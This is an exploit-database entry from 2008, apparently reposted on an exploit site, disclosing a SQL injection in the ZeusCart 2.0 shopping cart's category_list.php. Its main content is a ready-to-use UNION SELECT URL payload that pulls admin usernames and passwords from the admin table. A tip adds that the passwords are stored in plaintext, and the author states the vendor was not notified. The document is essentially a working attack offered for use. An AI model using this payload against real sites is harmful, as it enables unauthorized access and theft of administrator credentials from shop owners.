id: 2995
date: 05/11/2008
title: ZeusCart <= 2.0 (category_list.php) SQL Injection Vulnerability
author: t0pP8uZz
cves: 

===============================================================
ZeusCart <= 2.0 (category_list.php) SQL Injection Vulnerability
===============================================================




--==+================================================================================+==--
--==+      ZeusCart <= 2.0 (category_list.php) Remote SQL Injection Vulnerbility     +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz
Discovered On: 12 MAY 2008
Script Download: http://www.ajsquare.com/
DORK: N/A



Vendor Has Not Been Notified!



DESCRIPTION: 

ZeusCart (from AJ E-Commerce) suffers from a insecure mysql query, This allows the
remote attacker to arbitrary execute mysql code/querys.

the below injection will perform a SELECT query which will display admin credentials in RED text.



SQL Injection:

http://site.com/category_list.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(user_name,char(58),password),2/**/FROM/**/admin/*

NOTE/TIP: 

passwords are plaintext



#  0day.today [2023-03-27]  #